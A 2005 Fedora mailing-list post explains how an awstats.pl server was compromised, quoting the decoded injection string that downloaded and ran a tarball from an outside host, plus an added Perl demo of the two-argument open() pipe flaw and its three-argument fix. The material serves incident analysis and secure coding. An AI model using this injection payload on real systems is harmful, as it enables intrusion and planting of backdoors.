Security Breach

Paul Howarth paul at city-fan.org
Fri Mar 4 18:23:02 UTC 2005


David Cary Hart wrote:
> On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
> 
>>David Cary Hart wrote:
>>>Could you explain the series of events? It's not clear - to me - how
>>>this resulted in a compromised machine.
>>
>>Replace the url-encoded characters and you get:
>>
>>/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget 
>>zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv 
>>mech crond;export PATH=;crond;echo e_exp;%00
>>
>>So the attacker has tricked the script into executing a set of shell 
>>commands, which include changing directory to /tmp, downloading a 
>>tarball from a Romanian site, extracting that tarball and then executing 
>>a program from the downloaded and extracted tarball, after renaming it 
>>to "crond" in an effort to disguise it.
> 
> 
> I got that part. What I am trying to understand (please bear with me) is
> how the attacker might have modified the script command line.

I'm not all that familiar with perl, so the following may be completely 
wrong, but here goes.

awstats.pl contains code to search for its configuration file. A 
directory name may be specified as a parameter to the script. For each 
directory that the script searches, it tries the following:

if (open(CONFIG,"$searchdir$PROG.$SiteConfig.conf")) ...

Normally, this would cause the file pointed to by the expansion of 
"$searchdir$PROG.$SiteConfig.conf" to be opened. Now, if $searchdir 
starts with "|", instead of opening a file and then reading it, this 
runs the text following the "|" as a command and then reads back the 
output of the command from a pipe. So by using the "|", the attacker has 
tricked the script into running his command.

Paul.
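Worked illustration of the mechanism Paul describes, added here as an example and not taken from his message or from the awstats source. It reproduces the quoted two-argument open() beside a hardened three-argument form. The variable values, the `read_config_*` function names and the attacker string are constructed stand-ins; the real script fills `$searchdir` from the `configdir` CGI parameter.

```perl
#!/usr/bin/perl
# Demonstration of Perl's two-argument open() treating a leading "|" in
# attacker-controlled input as "run this command and read its output".
# Constructed example; not awstats code.
use strict;
use warnings;

# Stand-ins for the awstats variables seen in the quoted line.
my $PROG       = 'awstats';
my $SiteConfig = 'example';

# Vulnerable pattern, as quoted in the mail: two-argument open().
# Perl inspects the string for a leading "|" (pipe from a command),
# a trailing "|" (pipe to a command), or "<" / ">" redirections.
sub read_config_twoarg {
    my ($searchdir) = @_;
    my $path = "$searchdir$PROG.$SiteConfig.conf";
    open(CONFIG, $path) or return "open failed: $!\n";
    my @lines = <CONFIG>;
    close(CONFIG);
    return join('', @lines);
}

# Hardened pattern: three-argument open() with an explicit read mode.
# The third argument is taken literally as a file name, so "|cmd..."
# is just a (nonexistent) file and nothing is executed.
sub read_config_threearg {
    my ($searchdir) = @_;
    my $path = "$searchdir$PROG.$SiteConfig.conf";
    open(my $fh, '<', $path) or return "open failed: $!\n";
    my @lines = <$fh>;
    close($fh);
    return join('', @lines);
}

# Constructed "configdir" value. The trailing ";echo " turns the suffix
# the script appends ("awstats.example.conf") into a harmless argument;
# the attack in the mail instead ends in %00 (a NUL byte) so that the
# suffix lands past the end of the string handed to the shell.
my $evil = "|echo injected;echo ";

print "two-arg open:\n",   read_config_twoarg($evil);
print "three-arg open:\n", read_config_threearg($evil);
```

Run as-is, the two-argument version prints `injected` followed by `awstats.example.conf` (the shell ran both echo commands and Perl read their output as if it were the config file), while the three-argument version fails with "No such file or directory". Note that the three-argument form only closes the pipe trick; a directory name supplied by the client still needs to be validated against an allow-list before it is used to locate a configuration file.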




More information about the fedora-list mailing list